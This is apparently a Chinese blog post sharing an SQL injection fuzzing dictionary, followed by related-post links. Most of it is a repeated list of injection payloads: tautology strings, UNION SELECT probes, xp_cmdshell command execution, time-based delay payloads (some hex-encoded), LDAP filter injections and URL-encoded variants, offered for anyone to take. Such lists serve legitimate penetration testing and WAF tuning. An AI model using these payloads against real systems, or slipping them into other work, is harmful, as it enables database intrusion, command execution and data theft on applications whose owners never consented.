需要的自取

'

"

#

-

--

' --

--';

' ;

= '

= ;

= --

\x23

\x27

\x3D \x3B'

\x3D \x27

\x27\x4F\x52 SELECT *

\x27\x6F\x72 SELECT *

'or select *

admin'--

';shutdown--

<>"'%;)(&+

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

&lt;&gt;&quot;'%;)(&amp;+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

'

' and '' like '

' AnD '' like '

' or '' like '

' and '' like '%

' aND '' like '%

' and '' like ''--

' and 2>1--

' and 2>3--

') and ('x'='x

) and (1=1

'or''='

'or'='or'

a' or 1=1--

"a"" or 1=1--"

 or a = a

a' or 'a' = 'a

1 or 1=1

a' waitfor delay '0:0:10'--

1 waitfor delay '0:0:10'--

declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)

declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)

declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)

declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)

a'

?

' or 1=1

‘ or 1=1 --

x' AND userid IS NULL; --

x' AND email IS NULL; --

anything' OR 'x'='x

x' AND 1=(SELECT COUNT(*) FROM tabname); --

x' AND members.email IS NULL; --

x' OR full_name LIKE '%Bob%

23 OR 1=1

'; exec master..xp_cmdshell 'ping 172.10.1.255'--

'

'%20or%20''='

'%20or%20'x'='x

%20or%20x=x

')%20or%20('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

 or 0=0 #"

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

' or 1 --'

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

 or 1=1 or ""=

' or a=a--

 or a=a

') or ('a'='a

) or (a=a

hi or a=a

hi or 1=1 --"

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

"hi"") or (""a""=""a"

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

<>"'%;)(&+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

a' or 3=3--

"a"" or 3=3--"

' or 3=3

‘ or 3=3 --

SQL注入Fuzzing字典的更多相关文章

  1. SQL注入fuzz字典

    length Length + handler likeLiKe selectSeleCT sleepSLEEp databaseDATABASe delete having oroR asAs -~ ...

  2. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  3. DAY5 DVWA之SQL注入演练(low)

    1.设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸. 2.测试和分析页面的功能       这里有一个输入框 根据上面的提示,输入用户的id.然后我们输入之后,发现它返回了关于这个 ...

  4. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  5. 见招拆招:绕过WAF继续SQL注入常用方法

    Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过.WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招.那今天我在这里做个小小的扫盲吧.先来说说 ...

  6. 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...

  7. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  8. 『SQL注入』 User-Agent 手工注入的探测与利用分析

    原理很简单:后台在接收UA时没有对UA做过滤,也没有PDO进行数据交互(实际PDO是非常有必要的),导致UA中有恶意代码,最终在数据库中执行. Bug 代码: 本地顺手打了一个环境,Bug 代码部分: ...

  9. 实验吧_简单的sql注入_1、2、3

    简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...

  10. DVWA 黑客攻防演练(八)SQL 注入 SQL Injection

    web 程序中离不开数据库,但到今天 SQL注入是一种常见的攻击手段.如今现在一些 orm 框架(Hibernate)或者一些 mapper 框架( iBatis)会对 SQL 有一个更友好的封装,使 ...

随机推荐

  1. Solution -「POJ 1322」Chocolate

    Description Link. 包里有无穷多个巧克力,巧克力有 \(c\) 种颜色,每次从包里拿出不同颜色巧克力的概率都是相等的,桌面的巧克力不允许颜色相同,若某次拿出的巧克力与桌上的巧克力颜色相 ...

  2. Cplex求解教程(基于OPL语言,可作为大规模运算输入参考)

    最近导导让牛牛改篇论文,牛牛在她的指导下把非线性问题化成了线性.然鹅,化成线性后的模型决策变量和约束条件均达到上百甚至上千个,这让牛牛犯了难,以下方法或许能为这样大规模模型的变量和约束输入提供思路(๑ ...

  3. 关于wake on lan远程唤醒主机的问题,长时间关机无法远程唤醒

    英特尔在年初发布了几款低功耗的CPU,国内厂商在迷你主机领域纷纷搭载新款CPU,卖的火爆.之前关注过迷你主机这块,于是,我也入手一个迷你主机玩玩,买的是板载N100的迷你主机.使用过程中会涉及到如何远 ...

  4. Hosts映射

    Hosts映射 思考:如何通过主机名能够找到(ping)某个linux系统? 前言 Hosts:是一个文本文件,用来记录IP和Hostname的映射关系 DNS:是互联网上作为域名和IP地址映射的一个 ...

  5. 物理standby database的日常维护【转】

    1.停止Standby select process, status from v$managed_standby; --查看备库是否在应用日志进行恢复 alter database recover ...

  6. 11g GI监听测试增加其他本地端口

    11.2 GI中监听器的地址和端口信息被移到了 endpoints_listener.ora中. 使用 endpoints_listener.ora的情况下不应使用lsnrctl管理LISTENER, ...

  7. 低代码助力微信小程序对接,提升开发效率

    摘要:本文由葡萄城技术团队原创并首发.转载请注明出处:葡萄城官网,葡萄城为开发者提供专业的开发工具.解决方案和服务,赋能开发者. 前言 微信小程序相信大家都用过,相较于APP,微信小程序的优势在于其便 ...

  8. gitlab ci 集成 eslint/prettier/tsc 做代码审查,并使用 eslint 输出作为显示代码质量

    前言 想自动化一下公司里代码的部分审查,最初想用 reviewdog 的,但是公司的域名基本都在 VPN 中访问的,gitlab ci 的容器中是访问不到的,于是乎实验了 gitlab 代码质量功能. ...

  9. 17.1 隐藏执行CMD命令

    本章内容涉及使用Socket API和CMD命令行工具实现本地CMD命令执行.无管道正向CMD和无管道反向CMD三种功能.执行本地CMD实现使用CreateProcess函数创建一个新的CMD进程,并 ...

  10. vue + tornado 个人博客项目简介

    vue + tornado 个人博客项目简介 项目链接:https://www.freepd.top 项目链接:https://admin.freepd.top 项目简介 首页预览 本站接入了百度ap ...